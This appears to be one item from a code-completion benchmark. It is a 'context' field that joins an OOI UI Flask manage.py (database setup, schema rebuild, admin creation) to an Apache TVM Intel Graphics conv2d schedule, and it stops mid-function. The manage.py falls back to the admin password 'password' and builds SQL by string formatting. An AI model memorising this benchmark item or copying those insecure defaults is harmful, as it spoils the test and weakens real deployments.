gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
#!/usr/bin/env python
'''
Application manager. Responsible for starting the service,
performing db migrations, testing.
'''
import os
basedir = os.path.abspath(os.path.dirname(__file__))
COV = None
if os.environ.get('FLASK_COVERAGE'):
import coverage
COV = coverage.coverage(branch=True,include=basedir + '/app/*')
COV.start()
from ooiservices.app import create_app, db
from flask.ext.script import Manager, Shell, Server, prompt_bool
from flask.ext.migrate import Migrate, MigrateCommand
import flask.ext.whooshalchemy as whooshalchemy
from ooiservices.app.models import PlatformDeployment, User, UserScope, UserScopeLink, DisabledStreams
from datetime import datetime
import sqlalchemy.exc
import codecs
import yaml
if os.path.exists(os.path.join(basedir, '/app/config_local.yml')):
with open(basedir + '/app/config_local.yml', 'r') as f:
doc = yaml.load(f)
else:
with open(basedir + '/app/config.yml', 'r') as f:
doc = yaml.load(f)
env = doc['ENV_NAME']
app = create_app(env)
manager = Manager(app)
migrate = Migrate(app,db)
app.config['WHOOSH_BASE'] = 'ooiservices/whoosh_index'
whooshalchemy.whoosh_index(app, PlatformDeployment)
##------------------------------------------------------------------
## M@Campbell 02/10/2015
##
## Helper function to build index of models that are loaded manually (from .sql file)
#
# Usage:
# From shell:
# > from ooiservices.manage import rebuild_index
# > rebuild_index(model_name)
##------------------------------------------------------------------
def rebuild_index(model):
import whoosh
import flask_whooshalchemy
"""Rebuild search index of Flask-SQLAlchemy model"""
app.logger.info("Rebuilding {0} index...".format(model.__name__))
primary_field = model.pure_whoosh.primary_key_name
searchables = model.__searchable__
index_writer = flask_whooshalchemy.whoosh_index(app, model)
# Fetch all data
entries = model.query.all()
entry_count = 0
with index_writer.writer() as writer:
for entry in entries:
index_attrs = {}
for field in searchables:
index_attrs[field] = unicode(getattr(entry, field))
index_attrs[primary_field] = unicode(getattr(entry, primary_field))
writer.update_document(**index_attrs)
entry_count += 1
app.logger.info("Rebuilt {0} {1} search index entries.".format(str(entry_count), model.__name__))
def make_shell_context():
from ooiservices.app.models import User, UserScope, UserScopeLink, Array
from ooiservices.app.models import PlatformDeployment, InstrumentDeployment, Stream, StreamParameter, Watch
from ooiservices.app.models import OperatorEvent
from ooiservices.app.models import Platformname, Instrumentname, Annotation, Organization
from ooiservices.app.models import SystemEvent, SystemEventDefinition, UserEventNotification
ctx = {"app": app,
"db": db,
"User": User,
"UserScope": UserScope,
"UserScopeLink": UserScopeLink,
"Array": Array,
"PlatformDeployment": PlatformDeployment,
"InstrumentDeployment": InstrumentDeployment,
"Stream": Stream,
"Watch": Watch,
"OperatorEvent": OperatorEvent,
"StreamParameter": StreamParameter,
"Platformname": Platformname,
"Instrumentname": Instrumentname,
"Annotation": Annotation,
"Organization": Organization,
"SystemEvent": SystemEvent,
"SystemEventDefinition": SystemEventDefinition,
"UserEventNotification": UserEventNotification}
return ctx
@manager.command
def runserver():
app.run(host=app.config['HOST'], port=app.config['PORT'], debug=True)
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
@manager.command
def test(coverage=False, testmodule=None):
"""
Unit testing
usage:
python.exe manage.py test
python.exe manage.py test --coverage
python.exe manage.py test --coverage --testmodule=test_basics.py
:param coverage:
:return:
"""
import sys
"""Run the unit tests."""
if coverage and not os.environ.get('FLASK_COVERAGE'):
os.environ['FLASK_COVERAGE'] = '1'
os.execvp(sys.executable, [sys.executable] + sys.argv)
if COV:
COV.start()
import unittest
# Allow user to choose test module to run
if testmodule == None:
tests = unittest.TestLoader().discover(start_dir='tests')
else:
tests = unittest.TestLoader().discover(start_dir='tests', pattern=testmodule)
retval = unittest.TextTestRunner(verbosity=2).run(tests)
if COV:
COV.stop()
COV.save()
print('Coverage Summary:')
COV.report()
COV.erase()
if retval.errors:
sys.exit(1)
if retval.failures:
sys.exit(1)
@manager.option('--production', default=False)
@manager.option('-p', '--password', required=True)
@manager.option('-u', '--psqluser', default='postgres')
def deploy(password, production, psqluser):
from flask.ext.migrate import upgrade
from ooiservices.app.models import User, UserScope, UserScopeLink, Array, Organization
from ooiservices.app.models import PlatformDeployment, InstrumentDeployment, Stream, StreamParameterLink
from sh import psql
if production:
app.logger.info('Creating PRODUCTION Database')
try:
psql('-c', 'CREATE ROLE postgres LOGIN SUPERUSER')
except:
pass
psql('-c', 'create database ooiuiprod;', '-U', psqluser)
psql('ooiuiprod', '-c', 'create schema ooiui', '-U', psqluser)
psql('ooiuiprod', '-c', 'create extension postgis', '-U', psqluser)
else:
try:
psql('-c', 'CREATE ROLE postgres LOGIN SUPERUSER')
except:
pass
#Create the local database
app.logger.info('Creating DEV and TEST Databases')
psql('-c', 'create database ooiuidev;', '-U', psqluser)
psql('ooiuidev', '-c', 'create schema ooiui', '-U', psqluser)
psql('ooiuidev', '-c', 'create extension postgis', '-U', psqluser)
#Create the local test database
psql('-c', 'create database ooiuitest;', '-U', psqluser)
psql('ooiuitest', '-c', 'create schema ooiui', '-U', psqluser)
psql('ooiuitest', '-c', 'create extension postgis', '-U', psqluser)
from sqlalchemy.orm.mapper import configure_mappers
configure_mappers()
db.create_all()
if production:
app.logger.info('Populating Production Database . . .')
with open('db/ooiui_schema_data.sql') as f:
psql('-U', psqluser, 'ooiuiprod', _in=f)
with open('db/ooiui_params_streams_data.sql') as h:
psql('-U', psqluser, 'ooiuiprod', _in=h)
# with open('db/ooiui_vocab.sql') as i:
# psql('-U', psqluser, 'ooiuiprod', _in=i)
app.logger.info('Production Database loaded.')
else:
app.logger.info('Populating Dev Database . . .')
with open('db/ooiui_schema_data.sql') as f:
psql('-U', psqluser, 'ooiuidev', _in=f)
with open('db/ooiui_params_streams_data.sql') as h:
psql('-U', psqluser, 'ooiuidev', _in=h)
# with open('db/ooiui_vocab.sql') as i:
# psql('-U', psqluser, 'ooiuidev', _in=i)
app.logger.info('Dev Database loaded.')
# migrate database to latest revision
#upgrade()
if not os.getenv('TRAVIS'):
UserScope.insert_scopes()
app.logger.info('Insert default user, name: admin')
User.insert_user(password=password)
admin = User.query.first()
admin.scopes.append(UserScope.query.filter_by(scope_name='user_admin').first())
admin.scopes.append(UserScope.query.filter_by(scope_name='sys_admin').first())
admin.scopes.append(UserScope.query.filter_by(scope_name='data_manager').first())
admin.scopes.append(UserScope.query.filter_by(scope_name='redmine').first())
db.session.add(admin)
db.session.commit()
@manager.option('-s', '--schema', required=True)
@manager.option('-o', '--schema_owner', required=True)
@manager.option('-u', '--save_users', required=True)
@manager.option('-ds', '--save_disabled_streams', required=False)
@manager.option('-au', '--admin_username', required=False)
@manager.option('-ap', '--admin_password', required=False)
@manager.option('-af', '--first_name', required=False)
@manager.option('-al', '--last_name', required=False)
@manager.option('-ae', '--email', required=False)
@manager.option('-ao', '--org_name', required=False)
def rebuild_schema(schema, schema_owner, save_users, save_disabled_streams, admin_username, admin_password, first_name, last_name, email, org_name):
"""
Creates the OOI UI Services schema based on models.py
:usage: python manage.py rebuild_schema --schema ooiui --schema_owner postgres --save_users False --save_disabled_streams True --admin_username admin --admin_password password --first_name Default --last_name Admin --email defaultadmin@ooi.rutgers.edu --org_name Rutgers
:param schema:
:param schema_owner:
:return:
"""
# Check if schema exists
timestamp = int((datetime.utcnow() - datetime(1970, 1, 1)).total_seconds())
sql = "SELECT schema_name FROM information_schema.schemata WHERE schema_name = '{0}'".format(schema)
sql_result = db.engine.execute(sql).first()
if sql_result != None:
# Move current schema to _timestamp
app.logger.info('Backing up schema container {0} to {0}_{1}'.format(schema, timestamp))
db.engine.execute('ALTER SCHEMA {0} RENAME TO {0}_{1}'.format(schema, timestamp))
app.logger.info('Creating schema container: {0}'.format(schema))
db.engine.execute('CREATE SCHEMA IF NOT EXISTS {0} AUTHORIZATION {1}'.format(schema, schema_owner))
app.logger.info('Building schema objects')
db.create_all()
app.logger.info('Adding base user_scopes')
UserScope.insert_scopes()
db.session.commit()
app.logger.info('Loading default data into database')
load_data('ooiui_schema_data.sql')
db.session.commit()
app.logger.info('Loading params data into database')
load_data(sql_file='ooiui_params_streams_data.sql')
db.session.commit()
# app.logger.info('Loading new vocab data into database')
# load_data(sql_file='ooiui_vocab.sql')
db.session.commit()
if save_disabled_streams == 'True':
app.logger.info('Re-populating disabledstreams table from backup schema')
ds_sql = 'SELECT * FROM {0}_{1}.disabledstreams'.format(schema, timestamp)
sql_result = db.engine.execute(ds_sql)
fa = sql_result.fetchall()
for sresult in fa:
ds_record = DisabledStreams()
ds_record.id = sresult.id
ds_record.ref_des = getattr(sresult, 'ref_des', '')
ds_record.stream_name = getattr(sresult, 'stream_name', '')
ds_record.disabled_by = getattr(sresult, 'disabled_by', '')
ds_record.timestamp = getattr(sresult, 'timestamp', '')
db.session.add(ds_record)
db.engine.execute("SELECT nextval('ooiui.disabledstreams_id_seq')")
db.session.commit()
if save_users == 'True':
app.logger.info('Re-populating users from backup schema')
users_sql = 'SELECT * FROM {0}_{1}.users'.format(schema, timestamp)
sql_result = db.engine.execute(users_sql)
fa = sql_result.fetchall()
for sresult in fa:
try:
new_user = User()
new_user.id = sresult.id
new_user.user_id = getattr(sresult, 'user_id', '')
if hasattr(sresult, 'pass_hash'):
new_user._password = getattr(sresult, 'pass_hash', '')
else:
new_user._password = getattr(sresult, '_password', '')
new_user.email = getattr(sresult, 'email', '')
new_user.user_name = getattr(sresult, 'user_name', '')
new_user.active = getattr(sresult, 'active', '')
new_user.confirmed_at = getattr(sresult, 'confirmed_at', '')
new_user.first_name = getattr(sresult, 'first_name', '')
new_user.last_name = getattr(sresult, 'last_name', '')
new_user.phone_primary = getattr(sresult, 'phone_primary', '')
new_user.phone_alternate = getattr(sresult, 'phone_alternate', '')
new_user.role = getattr(sresult, 'role', '')
new_user.email_opt_in = getattr(sresult, 'email_opt_in', '')
new_user.organization_id = getattr(sresult, 'organization_id', '')
new_user.other_organization = getattr(sresult, 'other_organization', '')
new_user.vocation = getattr(sresult, 'vocation', '')
new_user.country = getattr(sresult, 'country', '')
new_user.state = getattr(sresult, 'state', '')
db.session.add(new_user)
db.engine.execute("SELECT nextval('ooiui.users_id_seq')")
db.session.commit()
except sqlalchemy.exc.IntegrityError, exc:
app.logger.info('Failure: rebuild_schema failed: ')
reason = exc.message
app.logger.info('Cause: ' + reason)
app.logger.info('Restoring to previous version')
app.logger.info('Restoring schema container {0}_{1} to {0}'.format(schema, timestamp))
db.engine.execute('ALTER SCHEMA {0} RENAME TO {0}_{1}_failed'.format(schema, timestamp))
db.engine.execute('ALTER SCHEMA {0}_{1} RENAME TO {0}'.format(schema, timestamp))
user_scope_link_sql = 'SELECT * FROM {0}_{1}.user_scope_link'.format(schema, timestamp)
sql_resultc = db.engine.execute(user_scope_link_sql)
fac = sql_resultc.fetchall()
for scresult in fac:
try:
new_user_scope_link = UserScopeLink()
new_user_scope_link.id = scresult.id
new_user_scope_link.user_id = scresult.user_id
new_user_scope_link.scope_id = scresult.scope_id
db.session.add(new_user_scope_link)
db.engine.execute("SELECT nextval('ooiui.user_scope_link_id_seq')")
db.session.commit()
except sqlalchemy.exc.IntegrityError, exc:
app.logger.info('Failure: rebuild_schema failed: ')
reason = exc.message
app.logger.info('Cause: ' + reason)
app.logger.info('Restoring to previous version')
app.logger.info('Restoring schema container {0}_{1} to {0}'.format(schema, timestamp))
db.engine.execute('ALTER SCHEMA {0} RENAME TO {0}_{1}_failed'.format(schema, timestamp))
db.engine.execute('ALTER SCHEMA {0}_{1} RENAME TO {0}'.format(schema, timestamp))
# db.engine.execute('INSERT INTO {0}.users SELECT * FROM {0}_{1}.users'.format(schema, timestamp))
# db.engine.execute('INSERT INTO {0}.user_scope_link SELECT * FROM {0}_{1}.user_scope_link'.format(schema, timestamp))
else:
app.logger.info('Adding the default admin user')
if admin_username is None:
app.logger.info('Admin username set to: admin')
admin_username = 'admin@ooi.rutgers.edu'
if admin_password is None:
app.logger.info('Admin password set to: password')
admin_password = 'password'
if first_name is None:
app.logger.info('Admin first_name set to: Default')
first_name = 'Default'
if last_name is None:
app.logger.info('Admin last_name set to: Admin')
last_name = 'Admin'
if email is None:
app.logger.info('Admin email set to: defaultadmin@ooi.rutgers.edu')
email = 'admin@ooi.rutgers.edu'
if org_name is None:
app.logger.info('Admin org_name set to: Rutgers')
org_name = 'Rutgers'
add_admin_user(username=admin_username, password=admin_password, first_name=first_name, last_name=last_name, email=email, org_name=org_name)
@manager.option('-u', '--username', required=True)
@manager.option('-p', '--password', required=True)
@manager.option('-f', '--first_name', required=True)
@manager.option('-l', '--last_name', required=True)
@manager.option('-e', '--email', required=True)
@manager.option('-o', '--org_name', required=True)
def add_admin_user(username, password, first_name, last_name, email, org_name):
'''
Creates a 'user_admin' scoped user using the supplied username and password
:param username:
:param password:
:return:
'''
app.logger.info('Insert user_name: %s' % username)
User.insert_user(username=username, password=password, first_name=first_name, last_name=last_name, email=email, org_name=org_name)
admin = User.query.filter_by(user_name=username).first()
admin.scopes.append(UserScope.query.filter_by(scope_name='user_admin').first())
admin.scopes.append(UserScope.query.filter_by(scope_name='sys_admin').first())
admin.scopes.append(UserScope.query.filter_by(scope_name='data_manager').first())
admin.scopes.append(UserScope.query.filter_by(scope_name='redmine').first())
db.session.add(admin)
db.session.commit()
@manager.command
def load_data(sql_file):
'''
Bulk loads the OOI UI data
:return:
'''
APP_ROOT = os.path.dirname(os.path.abspath(__file__)) # refers to application_top
APP_DB = os.path.join(APP_ROOT, '..', 'db')
with codecs.open(os.path.join(APP_DB, sql_file), "r", "utf-8") as f:
try:
from ooiservices.app.models import __schema__
db.session.execute("SET search_path = {0}, public, pg_catalog;".format(__schema__))
db.session.execute(f.read())
db.session.commit()
app.logger.info('Success: Bulk data loaded from file: ' + sql_file)
except sqlalchemy.exc.IntegrityError, exc:
app.logger.info('Failure: Bulk data NOT loaded from file: ' + sql_file)
reason = exc.message
app.logger.info('Cause: ' + reason)
@manager.command
def profile(length=25, profile_dir=None):
"""Start the application under the code profiler."""
from werkzeug.contrib.profiler import ProfilerMiddleware
app.wsgi_app = ProfilerMiddleware(app.wsgi_app, restrictions=[length],
profile_dir=profile_dir)
app.run()
@staticmethod
@manager.command
def destroy():
from sh import psql
db_check = str(db.engine)
if prompt_bool(
"Are you sure you want to do drop %s" % db_check
):
try:
psql('-c', 'drop database ooiuiprod', '-U', 'postgres')
except:
print 'prod db not found'
pass
try:
psql('-c', 'drop database ooiuidev', '-U', 'postgres')
except:
print 'dev db not found'
pass
try:
psql('-c', 'drop database ooiuitest', '-U', 'postgres')
except:
print 'test db not found'
pass
app.logger.info('Databases have been dropped.')
if __name__ == '__main__':
manager.run()
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name,unused-variable,unused-argument,no-else-return, too-many-arguments, too-many-locals, too-many-statements, no-member, too-many-branches, too-many-boolean-expressions
"""conv2d schedule on Intel Graphics"""
from __future__ import absolute_import as _abs
import tvm
from .. import generic
from .. import util
from .. import tag
from ..nn import pad
from ..nn.conv2d import conv2d, conv2d_NCHWc, conv2d_alter_layout, _get_workload
from ..nn.util import get_pad_tuple
from ..util import simplify
##### SCHEDULE UTILITIES #####
def tile_and_bind3d(s, tensor, z, y, x, z_factor=2, y_factor=None, x_factor=None):
""" tile and bind 3d """
y_factor = y_factor or z_factor
x_factor = x_factor or y_factor
zo, zi = s[tensor].split(z, z_factor)
yo, yi = s[tensor].split(y, y_factor)
xo, xi = s[tensor].split(x, x_factor)
s[tensor].reorder(zo, yo, xo, zi, yi, xi)
thread_z = tvm.thread_axis((0, z_factor), "threadIdx.z")
thread_y = tvm.thread_axis((0, y_factor), "threadIdx.y")
thread_x = tvm.thread_axis((0, x_factor), "threadIdx.x")
s[tensor].bind(zo, tvm.thread_axis("blockIdx.z"))
s[tensor].bind(zi, thread_z)
s[tensor].bind(yo, tvm.thread_axis("blockIdx.y"))
s[tensor].bind(yi, thread_y)
s[tensor].bind(xo, tvm.thread_axis("blockIdx.x"))
s[tensor].bind(xi, thread_x)
return xi, thread_z, thread_y, thread_x
@conv2d_alter_layout.register(["intel_graphics"])
def _alter_conv2d_layout(attrs, inputs, tinfos, F):
copy_inputs = [s for s in inputs]
data = tinfos[0]
kernel = tinfos[1]
import ast
padding = ast.literal_eval(str(attrs['padding']))
stride = ast.literal_eval(str(attrs['strides']))
wkl = _get_workload(data, kernel, stride, padding, data.dtype)
oc_bn = 1
kernel_shape = util.get_const_tuple(kernel.shape)
for oc_bn in range(16, 1, -1):
if kernel_shape[0] % oc_bn == 0:
break
new_attrs = {k: attrs[k] for k in attrs.keys()}
new_attrs["kernel_layout"] = 'OIHW%do' % (oc_bn)
if F.__name__ == 'tvm.relay.op':
# Derive channels for frontends (e.g ONNX) that miss "channel" field.
new_attrs["channels"] = inputs[1].checked_type.shape[attrs['kernel_layout'].index('O')]
if F.__name__ == 'nnvm.symbol':
out = F.contrib.conv2d_NCHWc(*copy_inputs, **new_attrs)
else:
out = F.nn.contrib_conv2d_nchwc(*copy_inputs, **new_attrs)
return out
@conv2d_NCHWc.register(["intel_graphics"])
def _decl_conv2d(data, kernel, stride, padding, dilation, layout, out_layout, out_dtype='float32'):
"""Conv2D operator for Intel Graphics backend.
Parameters
----------
data : tvm.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
kernel : tvm.Tensor
5-D with shape [num_filter, in_channel, filter_height, filter_width, nnum_filter_vec]
stride : int or a list/tuple of two ints
stride size, or [stride_height, stride_width]
padding : int or a list/tuple of two ints
padding size, or [pad_height, pad_width]
layout : str
layout of data
Returns
-------
output : tvm.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
assert data.shape[0].value == 1, "only support batch size=1 convolution on intel gpu"
assert data.dtype == kernel.dtype, "Do not support inputs with different data types now."
out_dtype = data.dtype
HPAD, WPAD, _, _ = get_pad_tuple(padding, kernel)
kernel_shape = util.get_const_tuple(kernel.shape)
if isinstance(stride, (tuple, list)):
HSTR, WSTR = stride
else:
HSTR, WSTR = stride, stride
return _decl_cl_spatialpack_NCHWc(data, kernel, stride, padding, out_dtype)
@generic.schedule_conv2d_NCHWc.register(["intel_graphics"])
def schedule_conv2d_NCHWc(outs):
"""Schedule for conv2d_nchw for Intel Graphics
Parameters
----------
outs: Array of Tensor
The computation graph description of conv2d_nchw
in the format of an array of tensors.
Returns
-------
s: Schedule
The computation schedule for conv2d_nchw.
"""
outs = [outs] if isinstance(outs, tvm.tensor.Tensor) else outs
s = tvm.create_schedule([x.op for x in outs])
scheduled_ops = []
def traverse(op):
"""inline all one-to-one-mapping operators except the last stage (output)"""
if tag.is_broadcast(op.tag):
if op not in s.outputs:
s[op].compute_inline()
for tensor in op.input_tensors:
if tensor.op.input_tensors and tensor.op not in scheduled_ops:
traverse(tensor.op)
if 'conv2d' in op.tag:
_schedule_cl_spatialpack_NCHWc(s, op)
scheduled_ops.append(op)
traverse(outs[0].op)
return s
def _decl_cl_spatialpack_NCHWc(data, kernel, stride, padding, out_dtype='float16'):
batch, in_channel, in_height, in_width = [util.get_const_int(x) for x in data.shape]
num_filter, channel, kernel_h, kernel_w, nv = [util.get_const_int(x) for x in kernel.shape]
num_filter = num_filter * nv
pad_top, pad_left, pad_down, pad_right = get_pad_tuple(padding, kernel)
if isinstance(stride, (tuple, list)):
stride_h, stride_w = stride
else:
stride_h, stride_w = stride, stride
out_channel = num_filter
out_height = simplify((in_height - kernel_h + pad_top + pad_down) // stride_h + 1)
out_width = simplify((in_width - kernel_w + pad_left + pad_right) // stride_w + 1)
oshape = (batch, out_channel, out_height, out_width)
rc = tvm.reduce_axis((0, in_channel), name='rc')
ry = tvm.reduce_axis((0, kernel_h), name='ry')
rx = tvm.reduce_axis((0, kernel_w), name='rx')
block_w = 1
block_h = 1
if stride_h == 2:
if num_filter + kernel_h == 515:
block_h = 4
block_w = 4
else:
block_h = 4
block_w = 5
elif kernel_h == 3:
if num_filter == 512:
block_h = 2
block_w = 7
else:
block_h = 2
block_w = 14
elif kernel_h == 7 and padding == 3 and stride == 1:
block_h = 3
block_w = 4
else:
block_h = 1
block_w = 16
attrs = {'block_h': block_h, 'block_w' : block_w}
c_h = out_height
c_w = out_width
if not out_height % block_h == 0:
c_h = (out_height // block_h + 1) * block_h
if not out_width % block_w == 0:
c_w = (out_width // block_w + 1) * block_w
pad_before = [0, 0, pad_top, pad_left]
pad_after = [0, 0, pad_down + c_h - block_h, pad_right + c_w - block_w]
temp = pad(data, pad_before, pad_after, name="pad_temp")
cshape = (batch, out_channel // nv, c_h, c_w, nv)
conv = tvm.compute(
cshape,
lambda nn, ff, yy, xx, vc:\
tvm.sum(
temp[nn, rc, yy * stride_h + ry, xx * stride_w + rx].astype(out_dtype) *
kernel[ff, rc, ry, rx, vc].astype(out_dtype),
axis=[rc, ry, rx]), name='conv', attrs=attrs)
output = tvm.compute(
oshape,
lambda nn, ff, yy, xx:
conv[nn][ff//nv][yy][xx][ff%nv],
name='output_unpack', tag='conv2d')
return output
def _schedule_cl_spatialpack_NCHWc(s, op):
output = op.output(0)
_, _, out_height, out_width = [util.get_const_int(x) for x in output.shape]
conv = op.input_tensors[0]
temp = s[conv].op.input_tensors[0]
kernel = s[conv].op.input_tensors[1]
temp_W = s.cache_read(temp, "warp", [conv])
conv_L = s.cache_write(conv, "local")
kernel_L = s.cache_read(kernel, "local", [conv_L])
_, in_channel, temp_h, temp_w = [util.get_const_int(x) for x in temp.shape]
attrs = s[conv].op.attrs
OUTPUT_BLOCK_HEIGHT = attrs['block_h']
OUTPUT_BLOCK_WIDTH = attrs['block_w']
# schedule conv
z_factor = 1
y_factor = 1
x_factor = 16
thread_z = tvm.thread_axis((0, z_factor), "threadIdx.z")
thread_y = tvm.thread_axis((0, y_factor), "threadIdx.y")
thread_x = tvm.thread_axis((0, x_factor), "threadIdx.x")
_, co, oh, ow, vc = s[conv].op.axis
ooh, ioh = s[conv].split(oh, factor=OUTPUT_BLOCK_HEIGHT)
oow, iow = s[conv].split(ow, factor=OUTPUT_BLOCK_WIDTH)
s[conv].reorder(_, co, ooh, oow, vc, ioh, iow)
coo, coi = s[conv].split(co, nparts=1)
ooho, oohi = s[conv].split(ooh, factor=z_factor)
oowo, oowi = s[conv].split(oow, factor=y_factor)
vco, vci = s[conv].split(vc, factor=x_factor)
s[conv].reorder(_, coo, vco, ooho, oowo, coi, oohi, oowi, vci, ioh, iow)
s[conv].bind(oohi, thread_z)
s[conv].bind(oowi, thread_y)
s[conv].bind(vci, thread_x)
s[conv].bind(ooho, tvm.thread_axis("blockIdx.z"))
s[conv].bind(oowo, tvm.thread_axis("blockIdx.y"))
s[conv].bind(coi, tvm.thread_axis("blockIdx.x"))
# schedule conv_L
s[conv_L].compute_at(s[conv], vci)
i, oc, h, w, vc = s[conv_L].op.axis
rc, ry, rx = s[conv_L].op.reduce_axis
s[conv_L].reorder(i, oc, rc, ry, rx, vc, h, w)
s[temp_W].compute_at(s[conv_L], rc)
if kernel.shape[3].value != 7:
s[conv_L].unroll(ry)
s[conv_L].unroll(rx)
# schedule temp
_, ci, h, w = s[temp].op.axis
tile_and_bind3d(s, temp, ci, h, w, 1, 16, 16)
# schedule temp_W
_, ci, h, w = s[temp_W].op.axis
zo, zi = s[temp_W].split(ci, 1)
yo, yi = s[temp_W].split(h, 1)
xo, xi = s[temp_W].split(w, 16)
s[temp_W].reorder(zo, yo, xo, zi, yi, xi)
s[temp_W].bind(zi, thread_z)
s[temp_W].bind(yi, thread_y)
s[temp_W].bind(xi, thread_x)
s[temp_W].storage_align(s[temp_W].op.axis[2], 16, 0)
#schedule kernel
# schedule kernel_L
if "2_14" in s[conv].op.tag:
s[kernel_L].compute_at(s[conv_L], ry)
else:
s[kernel_L].compute_at(s[conv_L], rx)
# schedule output
if output.op in s.outputs:
out = output
else:
s[output].compute_inline()
out = s.outputs[0]
_, co, h, w = s[out].op.axis
tile_and_bind3d(s, out, w, h, co, 4, 8, 8)
@conv2d.register(["intel_graphics"])
def decl_conv2d(data, kernel, stride, padding, dilation, layout='NCHW', out_dtype='float32'):
"""Conv2D operator for Intel Graphics backend.
Parameters
----------
data : tvm.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
kernel : tvm.Tensor
4-D with shape [num_filter, in_channel, filter_height, filter_width]
stride : int or a list/tuple of two ints
stride size, or [stride_height, stride_width]
padding : int or a list/tuple of two ints
padding size, or [pad_height, pad_width]
layout : str
layout of data
Returns
-------
output : tvm.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
assert layout == 'NCHW', "only support NCHW convolution on intel gpu"
assert data.shape[0].value == 1, "only support batch size=1 convolution on intel gpu"
assert data.dtype == kernel.dtype, "Do not support inputs with different data types now."
out_dtype = data.dtype
HPAD, WPAD, _, _ = get_pad_tuple(padding, kernel)
kernel_shape = util.get_const_tuple(kernel.shape)
if isinstance(stride, (tuple, list)):
HSTR, WSTR = stride
else:
HSTR, WSTR = stride, stride
return _decl_cl_spatialpack(data, kernel, stride, padding, layout, out_dtype)
@generic.schedule_conv2d_nchw.register(["intel_graphics"])
def schedule_conv2d_nchw(outs):
"""Schedule for conv2d_nchw for Intel Graphics
Parameters
----------
outs: Array of Tensor
The computation graph description of conv2d_nchw
in the format of an array of tensors.
Returns
-------
s: Schedule
The computation schedule for conv2d_nchw.
"""
outs = [outs] if isinstance(outs, tvm.tensor.Tensor) else outs
s = tvm.create_schedule([x.op for x in outs])
scheduled_ops = []
def traverse(op):
"""inline all one-to-one-mapping operators except the last stage (output)"""
if tag.is_broadcast(op.tag):
if op not in s.outputs:
s[op].compute_inline()
for tensor in op.input_tensors:
if tensor.op.input_tensors and tensor.op not in scheduled_ops:
traverse(tensor.op)
if 'conv2d' in op.tag:
_schedule_cl_spatialpack(s, op)
scheduled_ops.append(op)
traverse(outs[0].op)
return s
def _decl_cl_spatialpack(data, kernel, stride, padding, layout, out_dtype='float16'):
batch, in_channel, in_height, in_width = [util.get_const_int(x) for x in data.shape]
num_filter, channel, kernel_h, kernel_w = [util.get_const_int(x) for x in kernel.shape]
pad_top, pad_left, pad_down, pad_right = get_pad_tuple(padding, kernel)
if isinstance(stride, (tuple, list)):
stride_h, stride_w = stride
else:
stride_h, stride_w = stride, stride
out_channel = num_filter
out_height = simplify((in_height - kernel_h + pad_top + pad_down) // stride_h + 1)
out_width = simplify((in_width - kernel_w + pad_left + pad_right) // stride_w + 1)
oshape = (batch, out_channel, out_height, out_width)
rc = tvm.reduce_axis((0, in_channel), name='rc')
ry = tvm.reduce_axis((0, kernel_h), name='ry')
rx = tvm.reduce_axis((0, kernel_w), name='rx')
block_w = 1
block_h = 1
if stride_h == 2:
if num_filter + kernel_h == 515:
block_h = 4
block_w = 4
else:
block_h = 4
block_w = 5
elif kernel_h == 3:
if num_filter == 512:
block_h = 2
block_w = 7
else:
block_h = 2
block_w = 14
elif kernel_h == 7 and padding == 3 and stride == 1:
block_h = 3
block_w = 4
else:
block_h = 1
block_w = 16
attrs = {'block_h': block_h, 'block_w' : block_w}
c_h = out_height
c_w = out_width
if not out_width % block_w == 0:
c_w = (out_width // block_w + 1) * block_w
if not out_height % block_h == 0:
c_h = (out_height // block_h + 1) * block_h
pad_before = [0, 0, pad_top, pad_left]
pad_after = [0, 0, pad_down + c_h - block_h, pad_right + c_w - block_w]
temp = pad(data, pad_before, pad_after, name="pad_temp")
nv = 16
if not num_filter % nv == 0:
num_filter = (num_filter // nv + 1) * nv
out_channel = num_filter
cshape = (batch, out_channel // nv, c_h, c_w, nv)
kvshape = (num_filter // nv, channel, kernel_h, kernel_w, nv)
kernel_vec = tvm.compute(
kvshape,
lambda co, ci, kh, kw, vc:
kernel[co*nv + vc][ci][kh][kw], name='kernel_vec')
conv = tvm.compute(
cshape,
lambda nn, ff, yy, xx, vc:\
tvm.sum(
temp[nn, rc, yy * stride_h + ry, xx * stride_w + rx].astype(out_dtype) *
kernel_vec[ff, rc, ry, rx, vc].astype(out_dtype),
axis=[rc, ry, rx]), name='conv', attrs=attrs)
output = tvm.compute(
oshape,
lambda nn, ff, yy, xx:
conv[nn][ff//nv][yy][xx][ff%nv],
name='output_unpack', tag='conv2d')
return output
def _schedule_cl_spatialpack(s, op):
output = op.output(0)
_, _, out_height, out_width = [util.get_const_int(x) for x in output.shape]
conv = op.input_tensors[0]
temp = s[conv].op.input_tensors[0]
kernel_vec = s[conv].op.input_tensors[1]
kernel = s[kernel_vec].op.input_tensors[0]
temp_W = s.cache_read(temp, "warp", [conv])
conv_L = s.cache_write(conv, "local")
kernel_L = s.cache_read(kernel_vec, "local", [conv_L])
_, in_channel, temp_h, temp_w = [util.get_const_int(x) for x in temp.shape]
attrs = s[conv].op.attrs
OUTPUT_BLOCK_HEIGHT = attrs['block_h']
OUTPUT_BLOCK_WIDTH = attrs['block_w']
# schedule conv
z_factor = 1
y_factor = 1
x_factor = 16
thread_z = tvm.thread_axis((0, z_factor), "threadIdx.z")
thread_y = tvm.thread_axis((0, y_factor), "threadIdx.y")
thread_x = tvm.thread_axis((0, x_factor), "threadIdx.x")
_, co, oh, ow, vc = s[conv].op.axis
ooh, ioh = s[conv].split(oh, factor=OUTPUT_BLOCK_HEIGHT)
oow, iow = s[conv].split(ow, factor=OUTPUT_BLOCK_WIDTH)
s[conv].reorder(_, co, ooh, oow, vc, ioh, iow)
